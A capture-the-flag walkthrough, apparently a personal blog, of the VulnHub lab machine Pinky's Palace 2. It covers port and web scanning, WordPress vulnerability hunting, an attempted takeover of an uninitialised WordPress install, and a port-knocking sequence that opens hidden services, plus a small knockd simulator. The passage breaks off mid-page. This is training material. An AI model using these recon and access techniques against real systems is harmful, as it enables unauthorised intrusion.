
Pinky’s Palace 2

This one, to cap off my Linux machine list, is supposed to be one of the most difficult on Vulnhub. Let’s hope I do well. I’m treating this one as a test of whether I have strong Linux fundamentals, so I can feel confident enough to move on to Windows for a few months.


Recon

  • Note From VulnHub: Wordpress will not render correctly. You will need to alter your host file with the IP shown on the console: echo 192.168.x.x pinkydb | sudo tee -a /etc/hosts
  • Difficulty to get entry: easy/medium
  • Difficulty to get root: medium/hard
  • Only works in VMWare
  • we must read /root/root.txt
  • Is ‘realistic’
  • Pictures show us a blog - it must be a webapp box
  • Released 18 March 2018

Enumeration

$ sudo nmap -p- 192.168.2.24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 22:50 EST
Nmap scan report for 192.168.2.24
Host is up (0.00029s latency).
All 65535 scanned ports on 192.168.2.24 are closed (65202) or filtered (333)
MAC Address: 08:D2:3E:25:52:56 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds

Interesting! Blocking basic nmap? Let’s try this…

$ nmap -sT -p- 192.168.2.24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 23:13 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite

Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds

└─$ nikto --host 192.168.2.24 --port 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    192.168.2.24
+ Target Port:        80
+ Start Time:         2021-02-28 22:51:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://pinkydb/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2021-02-28 22:52:38 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Let’s check that apache version for a quick root…

$ searchsploit apache 2.4.25
...
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation                  | linux/local/46676.php
...

Let’s follow that potential wp-version…

searchsploit wordpress 4.9.1
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
WordPress Core < 4.9.6 - (Authenticated)  | php/webapps/44949.txt
WordPress Core < 5.2.3 - Viewing Unauthen | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Den | php/dos/47800.py
WordPress Plugin Database Backup < 5.2 -  | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60  | php/webapps/39553.txt
WordPress Plugin EZ SQL Reports < 4.11.37 | php/webapps/38176.txt
WordPress Plugin iThemes Security < 7.0.3 | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11. | php/webapps/48918.sh
WordPress Plugin User Role Editor < 4.25  | php/webapps/44595.rb
WordPress Plugin Userpro < 4.9.17.1 - Aut | php/webapps/43117.txt
WordPress Plugin UserPro < 4.9.21 - User  | php/webapps/46083.txt
------------------------------------------ ---------------------------------
Shellcodes: No Results

And checking out /secret

$ curl 192.168.2.24/secret/bambam.txt
8890
7000
666

pinkydb

Wtf? Maybe those are open ports…?

┌──(kali㉿kali)-[~/.ssh]
└─$ curl 192.168.2.24:8890                                              1 ⨯
curl: (7) Failed to connect to 192.168.2.24 port 8890: Connection refused
  
┌──(kali㉿kali)-[~/.ssh]
└─$ curl 192.168.2.24:7000                                              7 ⨯
curl: (7) Failed to connect to 192.168.2.24 port 7000: Connection refused
  
┌──(kali㉿kali)-[~/.ssh]
└─$ curl 192.168.2.24:666                                               7 ⨯
curl: (7) Failed to connect to 192.168.2.24 port 666: Connection refused

Phat Dirb:

└─$ dirb http://192.168.2.24 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb 28 23:03:43 2021
URL_BASE: http://192.168.2.24/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

  GENERATED WORDS: 20458

---- Scanning URL: http://192.168.2.24/ ----
 ==> DIRECTORY: http://192.168.2.24/secret/
+ http://192.168.2.24/server-status (CODE:403|SIZE:300)                    
  ==> DIRECTORY: http://192.168.2.24/wordpress/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/
  ==> DIRECTORY: http://192.168.2.24/wp-content/
  ==> DIRECTORY: http://192.168.2.24/wp-includes/
 
---- Entering directory: http://192.168.2.24/secret/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/ ----
 ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-includes/
 
---- Entering directory: http://192.168.2.24/wp-admin/ ----
 ==> DIRECTORY: http://192.168.2.24/wp-admin/css/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/images/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/includes/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/js/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/maint/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/network/
  ==> DIRECTORY: http://192.168.2.24/wp-admin/user/
 
---- Entering directory: http://192.168.2.24/wp-content/ ----
 ==> DIRECTORY: http://192.168.2.24/wp-content/plugins/
  ==> DIRECTORY: http://192.168.2.24/wp-content/themes/
 
---- Entering directory: http://192.168.2.24/wp-includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/ ----
 ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/css/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/images/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/includes/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/js/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/maint/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/network/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-admin/user/
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/ ----
 ==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/
  ==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/themes/
 
---- Entering directory: http://192.168.2.24/wordpress/wp-includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/css/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/images/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/js/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/maint/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-admin/network/ ----
   
---- Entering directory: http://192.168.2.24/wp-admin/user/ ----
   
---- Entering directory: http://192.168.2.24/wp-content/plugins/ ----
 ==> DIRECTORY: http://192.168.2.24/wp-content/plugins/akismet/
 
---- Entering directory: http://192.168.2.24/wp-content/themes/ ----
   
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/css/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/images/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/includes/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/js/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/maint/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/network/ ----
                     
---- Entering directory: http://192.168.2.24/wordpress/wp-admin/user/ ----
     
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/ ----
==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/akismet/       
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/themes/ ----
     
---- Entering directory: http://192.168.2.24/wp-content/plugins/akismet/ ----
==> DIRECTORY: http://192.168.2.24/wp-content/plugins/akismet/_inc/            
==> DIRECTORY: http://192.168.2.24/wp-content/plugins/akismet/views/           
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/akismet/ ----
==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/akismet/_inc/  
==> DIRECTORY: http://192.168.2.24/wordpress/wp-content/plugins/akismet/views/ 
 
---- Entering directory: http://192.168.2.24/wp-content/plugins/akismet/_inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wp-content/plugins/akismet/views/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/akismet/_inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
 
---- Entering directory: http://192.168.2.24/wordpress/wp-content/plugins/akismet/views/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
     
-----------------
END_TIME: Sun Feb 28 23:06:18 2021
DOWNLOADED: 327328 - FOUND: 1

Okay I can’t actually render any of that in the browser… are these false positives…? Let’s see if akismet has any vulns.

$ searchsploit akismet
----------------------------------------------------- ---------------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- ---------------------------------
WordPress Plugin Akismet - Multiple Cross-Site Scrip | php/webapps/37902.php
WordPress Plugin Akismet 2.1.3 - Cross-Site Scriptin | php/webapps/30036.html
----------------------------------------------------- ---------------------------------
Shellcodes: No Result

msf6 auxiliary(scanner/http/wordpress_scanner) > run

[*] Trying 192.168.2.24
[+] 192.168.2.24 - Detected Wordpress 4.9.4
[*] 192.168.2.24 - Enumerating plugins
[*] 192.168.2.24 - Progress      0/88009 (0.0%)
[*] 192.168.2.24 - Progress   1000/88009 (1.13%)
[*] 192.168.2.24 - Progress   2000/88009 (2.27%)
[*] 192.168.2.24 - Progress   3000/88009 (3.4%)
[+] 192.168.2.24 - Detected plugin: akismet version 4.0.2
[*] 192.168.2.24 - Progress   4000/88009 (4.54%)
[*] 192.168.2.24 - Progress   5000/88009 (5.68%)
[*] 192.168.2.24 - Progress   6000/88009 (6.81%)
[*] 192.168.2.24 - Progress   7000/88009 (7.95%)
[*] 192.168.2.24 - Progress   8000/88009 (9.08%)
[*] 192.168.2.24 - Progress   9000/88009 (10.22%)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

wpscan --url 192.168.2.24 --enumerate u                                                                                                                                1 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.13
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.2.24/ [192.168.2.24]
[+] Started: Sun Feb 28 23:40:55 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.2.24/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://192.168.2.24/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.2.24/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.2.24/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.2.24/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] pinky1337
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Feb 28 23:40:57 2021
[+] Requests Done: 26
[+] Cached Requests: 29
[+] Data Sent: 6.536 KB
[+] Data Received: 231.134 KB
[+] Memory used: 154.168 MB
[+] Elapsed time: 00:00:02

Huh, Xml RPC looks like it’s enabled eh?

Too bad all we can do with this is a DDoS attack…

Coming back to the Nmap… let’s look up those port numbers and see if we can come up with anything.

I found that port 31337 is commonly used for Back Orifice backdoor, I wonder if we can use it? I dug into this a bunch and even if I found a build for BO2k, it’s password protected so it’s unlikely it would be useful for me.

I circled back to the CVE list for the wordpress version… https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-252523/Wordpress-Wordpress-4.9.4.html
There are a lot of XSS vulnerabilities, and a PHP object injection that could lead to RCE, but they all require author/contributor accounts or a login.

https://www.cvedetails.com/cve/CVE-2019-9787/ is an RCE for an unauthenticated user, and I did notice there is a place where I can comment on the wordpress site. Perhaps this is what we need!

Apparently, the WP comment code in this version looks like this:

if ( current_user_can( 'unfiltered_html' ) ) {
    if (! wp_verify_nonce( $_POST['_wp_unfiltered_html_comment'], 'unfiltered-html-comment' )) {
        $_POST['comment'] = wp_filter_post_kses($_POST['comment']);
    }
} else {
    $_POST['comment'] = wp_filter_kses($_POST['comment']);
}

There is a difference in the strictness of the filtering for an unauthenticated user versus an admin…

Quote:
‘This allows an attacker to create comments that can contain much more HTML tags and attributes than comments should usually be allowed to contain. However, although wp_filter_post_kses() is much more permissive, it still removes any HTML tags and attributes that could lead to Cross-Site-Scripting vulnerabilities.’

However, this snippet reconstructs links and provides a stored XSS:

    if (!empty($atts['rel'])) {
        // the processing of the 'rel' attribute happens here
        ⋮
        $text = '';
        foreach ($atts as $name => $value) {
            $text .= $name . '="' . $value . '" ';
        }
    }
    return '<a ' . $text . ' rel="' . $rel . '">';
}  

Example:
‘For example: would turn into
after processing.’

Okay cool, but for this to actually benefit me… I need a real admin to come along after me and use the site so I can hijack the session and abuse the underlying vulnerability (the lack of CSRF protection). Fuck. Dead end? Either way, this is a stored XSS vulnerability. How we can chain that into an RCE I’m not sure yet, given the lack of real users mucking about on the page. Do you think the author would go so far as to simulate an admin logging in? I don’t think so honestly…

I’ve still got nothing! I started running some more dirb type scanners, ZAP actually came up with some more juice:

TinyMCE eh?

└─$ searchsploit tinymce
------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                            |  Path
------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                      | php/webapps/4810.txt
CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion                            | php/webapps/34639.txt
Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)                | php/webapps/10183.php
MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload                          | php/webapps/15768.txt
TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities               | php/webapps/9296.txt
TinyMCE 2.0.1 - 'menuID' SQL Injection                                                    | php/webapps/7506.txt
TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload                                       | php/webapps/15194.txt
TinyMCE WYSIWYG Editor - Multiple Vulnerabilities                                         | php/webapps/11358.txt
WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure                 | php/webapps/19022.txt
------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Okay…

While poking around trying to match one of the tinymce plugins, I found this:

It looks like there’s an uninitialized WordPress instance running at /wordpress? Could I set up a database on my host, initialize this, upload a PHP web shell and get onto the machine? I think I could, right? I think I’ve finally found the hole!

Recap

  • Blocks basic Nmap scans (there may be more than just the web server)
  • WordPress blog on port 80
  • Potential local PE with Apache (I’ve never gotten that damn logrotate thing to work)
  • WordPress version probably “Tested up to: 4.9.1”, but is actually 4.9.4 from /wp-links-opml.php
  • Some cryptic info in a text file (8890 7000 666 pinkydb)
  • The akismet plugin is floating around there, and seems like it may have an XSS vulnerability we could use. (Nope, we found the version and it’s too old)
  • Username pinky1337 on WordPress
  • XML-RPC is enabled!
  • CVE-2018-20148 seems like a valid way in, but there’s minimal PoC code available. It requires XML-RPC being enabled, which it is. However, it also requires authentication as a user, which we don’t have.
  • CVE-2019-9787 is a stored XSS vulnerability that we should be able to use unauthenticated, but we need more in an attack chain to pop a shell
  • TinyMCE seems to be present with what seems like mostly default plugins. This may be vulnerable
  • There seems to be an uninitialized WordPress instance at /wordpress; we should be able to use this to get a shell!

Exploitation

Alright, first we need to set up a database for this to connect to. We likely only have one shot at this: if we fuck up the configuration, this door will be closed because we cannot edit the config.

$ sudo apt update
$ sudo apt install mariadb-server
$ service mysql start
$ sudo mysql
> CREATE DATABASE wordpress; 
> CREATE USER 'wordpress'@'localhost' IDENTIFIED BY 'password';
> GRANT ALL ON wordpress.* TO 'wordpress'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;
> CREATE USER 'wordpress'@'192.168.2.24' IDENTIFIED BY 'password';
> GRANT ALL ON wordpress.* TO 'wordpress'@'192.168.2.24' IDENTIFIED BY 'password' WITH GRANT OPTION;
> FLUSH PRIVILEGES;
> exit;

Fill in the web form…


Cross our fingers and….


Fuck. Another dead end. Psych. Moving back a step…

Enumeration Round 2

I really think I’ve gathered almost everything, at my current level of skill, that I know how to find without digging really deep. I’m going to spend some amount of time on the clues I have already…

Let’s focus for a while on what bambam.txt could be trying to tell us…

8890
7000
666

pinkydb

I know these are likely ports, especially with the reference to the hostname pinkydb… But they’re all closed ports, so I couldn’t do anything with them.

I did some research on the ports but couldn’t find anything specific on what each may be. I searched for ‘sequence of ports’ and got led to ‘port knocking’, which is quite interesting:

In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s). A variant called single packet authorization (SPA) exists, where only a single "knock" is needed, consisting of an encrypted packet.

The primary purpose of port knocking is to prevent an attacker from scanning a system for potentially exploitable services by doing a port scan, because unless the attacker sends the correct knock sequence, the protected ports will appear closed. 

That’s insanity honestly, I’ve never heard of such a thing. But the author went through enough effort to block the default nmap, perhaps that was a hint?

So basically:
- We attempt connections at the sequence of ports 8890, 7000, 666
- We re-scan with nmap
- Hopefully we see a new service pop up?

┌──(kali㉿kali)-[~]
└─$  nc -nv 192.168.2.24 8890
(UNKNOWN) [192.168.2.24] 8890 (?) : Connection refused
                                                                                
┌──(kali㉿kali)-[~]
└─$  nc -nv 192.168.2.24 7000                                               1 ⨯
(UNKNOWN) [192.168.2.24] 7000 (bbs) : Connection refused
                                                                                
┌──(kali㉿kali)-[~]
└─$  nc -nv 192.168.2.24 666                                                1 ⨯
(UNKNOWN) [192.168.2.24] 666 (?) : Connection refused
                                                                                
┌──(kali㉿kali)-[~]
└─$ nmap -sT -p- 192.168.2.24                                               1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:02 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00051s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite

Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds

…no. I should do some more research on how to actually initiate this; it’s probably not this simple. A quick search for nmap port-knocking…
Here’s a little guide from OWASP about how to do this:
https://sushant747.gitbooks.io/total-oscp-guide/content/port_knocking.html

Oh cool of course someone wrote a CLI for this…

$ apt-get install knockd


# Run Before Scan
$ sudo nmap -sT -p-  192.168.2.24
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:30 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00047s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite
MAC Address: 08:D2:3E:25:52:56 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds

# Create Knock Script
echo "\
knock -v 192.168.2.24 8890 7000 666
knock -v 192.168.2.24 8890 666 7000
knock -v 192.168.2.24 666 7000 8890
knock -v 192.168.2.24 666 8890 7000
knock -v 192.168.2.24 7000 8890 666
knock -v 192.168.2.24 7000 666 8890" > x.sh

└─$ sh x.sh                                                                                                                                            2 ⨯
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:8890
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:7000
hitting tcp 192.168.2.24:666
hitting tcp 192.168.2.24:8890

$ sudo nmap -sT -p-  192.168.2.24
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:56 EST
Nmap scan report for pinkydb (192.168.2.24)
Host is up (0.00032s latency).
Not shown: 65322 closed ports, 210 filtered ports
PORT      STATE SERVICE
4655/tcp  open  unknown
7654/tcp  open  unknown
31337/tcp open  Elite
MAC Address: 08:D2:3E:25:52:56 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds

Oh? Now those ports are no longer filtered, but open! Holy shit fun!
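One plausible reason the one-at-a-time nc attempts did nothing while x.sh worked is the knock daemon’s sequence timeout (knockd defaults to 5 seconds between knocks). The following is an added example, not code from the original post or from the box: a simplified knockd-style evaluator that replays a constructed log of connection attempts and reports which sources completed the 8890, 7000, 666 sequence. The log format, source addresses and timestamps are made up; the mapping of the sequence to ports 4655, 7654 and 31337 is what the scans above showed.

```python
"""Simplified knockd-style sequence evaluator (added example, not from the post).

Rules modelled: the sequence ports must arrive in order; each knock must
follow the previous one within seq_timeout (knockd default 5 s); a knock on a
sequence port that is not the next expected one discards the partial attempt;
ports outside the sequence are ignored, as knockd's packet filter only
captures the ports that appear in its doors' sequences.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, Iterable, List, Tuple

# Knock sequence from bambam.txt and the ports that showed up open afterwards.
KNOCK_SEQUENCE: Tuple[int, ...] = (8890, 7000, 666)
OPENED_PORTS: Tuple[int, ...] = (4655, 7654, 31337)
SEQ_TIMEOUT = 5.0  # seconds; knockd's default seq_timeout

# Constructed (hypothetical) log line format: "<ISO time> src=<ip> dport=<port>"
LOG_RE = re.compile(r"^(\S+) src=(\d+\.\d+\.\d+\.\d+) dport=(\d+)$")


def parse_log_line(line: str) -> Tuple[float, str, int]:
    """Turn one constructed log line into (unix_timestamp, src_ip, dst_port)."""
    m = LOG_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts = datetime.fromisoformat(m.group(1)).timestamp()
    return ts, m.group(2), int(m.group(3))


@dataclass
class Attempt:
    stage: int = 0        # how many sequence ports have matched so far
    last_seen: float = 0.0


@dataclass
class KnockDaemon:
    sequence: Tuple[int, ...] = KNOCK_SEQUENCE
    opens: Tuple[int, ...] = OPENED_PORTS
    timeout: float = SEQ_TIMEOUT
    attempts: Dict[str, Attempt] = field(default_factory=dict)
    opened_for: Dict[str, List[int]] = field(default_factory=dict)

    def knock(self, ts: float, src: str, port: int) -> bool:
        """Feed one connection attempt; True if it completed the sequence."""
        if port not in self.sequence:
            return False             # never seen by the daemon's packet filter
        att = self.attempts.get(src)
        if att is not None and ts - att.last_seen > self.timeout:
            del self.attempts[src]   # stale partial sequence is forgotten
            att = None
        if att is None:
            if port != self.sequence[0]:
                return False         # nothing in progress, not the first knock
            att = self.attempts[src] = Attempt()
        elif port != self.sequence[att.stage]:
            del self.attempts[src]   # wrong port: the attempt is discarded
            return False
        att.stage += 1
        att.last_seen = ts
        if att.stage == len(self.sequence):
            del self.attempts[src]
            self.opened_for[src] = list(self.opens)   # the "door" opens
            return True
        return False

    def replay(self, lines: Iterable[str]) -> Dict[str, List[int]]:
        """Replay log lines in order; return the sources that opened the door."""
        for line in lines:
            self.knock(*parse_log_line(line))
        return dict(self.opened_for)


# Constructed sample log: 10.0.0.1 knocks by hand roughly 30 s apart (like the
# separate nc commands), 10.0.0.2 sends the right order within seconds,
# 10.0.0.3 sends the ports in the wrong order and then hits the web server.
SAMPLE_LOG = [
    "2021-03-01T15:00:00 src=10.0.0.1 dport=8890",
    "2021-03-01T15:00:30 src=10.0.0.1 dport=7000",
    "2021-03-01T15:01:05 src=10.0.0.1 dport=666",
    "2021-03-01T15:30:00 src=10.0.0.2 dport=8890",
    "2021-03-01T15:30:01 src=10.0.0.2 dport=7000",
    "2021-03-01T15:30:02 src=10.0.0.2 dport=666",
    "2021-03-01T15:30:03 src=10.0.0.3 dport=666",
    "2021-03-01T15:30:04 src=10.0.0.3 dport=7000",
    "2021-03-01T15:30:05 src=10.0.0.3 dport=8890",
    "2021-03-01T15:30:06 src=10.0.0.3 dport=80",
]


def main() -> None:
    opened = KnockDaemon().replay(SAMPLE_LOG)
    for src in sorted({parse_log_line(line)[1] for line in SAMPLE_LOG}):
        status = f"opened {opened[src]}" if src in opened else "nothing opened"
        print(f"{src}: {status}")


if __name__ == "__main__":
    main()
```

Raising the timeout to 60 seconds lets the slow 10.0.0.1 sequence through, which is the knob a defender tunes against the inconvenience of hand-typed knocks.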

┌──(kali㉿kali)-[~/scripts/port_knock]
└─$ nc 192.168.2.24 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky's Palace.
=>

And now when we nc onto 31337 we get a little shell?

=> ls
ls

Looks like it just echoes commands back at us… could probably escape out of this?

$ nc 192.168.2.24 4655 
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3

Port 4655 is SSH.

┌──(kali㉿kali)-[~/scripts/port_knock]
└─$  nc 192.168.2.24 7654                                                                                                                            127 ⨯
^C
                                                                                                                                                           
┌──(kali㉿kali)-[~/scripts/port_knock]
└─$ curl 192.168.2.24:7654                                                                                                                             1 ⨯
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
